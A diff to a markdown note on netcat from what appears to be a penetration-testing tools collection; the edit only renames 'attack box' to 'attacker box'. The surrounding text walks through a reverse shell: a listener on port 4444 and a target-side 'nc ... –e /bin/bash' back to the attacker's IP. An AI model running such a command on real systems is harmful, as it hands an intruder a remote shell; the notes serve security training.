thestationary/stationary/kali-tools/ncat.md

 1. Setup a Netcat listener.
 2. Connect to the Netcat listener from the target host.
-3. Issue commands on the target host from the attack box.
+3. Issue commands on the target host from the attacker box.

-First we setup a Netcat listener on the attack box which is listening on port 4444 with the following command:
+First we setup a Netcat listener on the attacker box which is listening on port 4444 with the following command:

 ```
 $ nc –lvp 4444

 ```

-Than we issue the following command on the target host to connect to our attack box (remember we have remote code execution on this box):
+Than we issue the following command on the target host to connect to our attacker box (remember we have remote code execution on this box):

 ```
 $ nc 192.168.100.113 4444 –e /bin/bash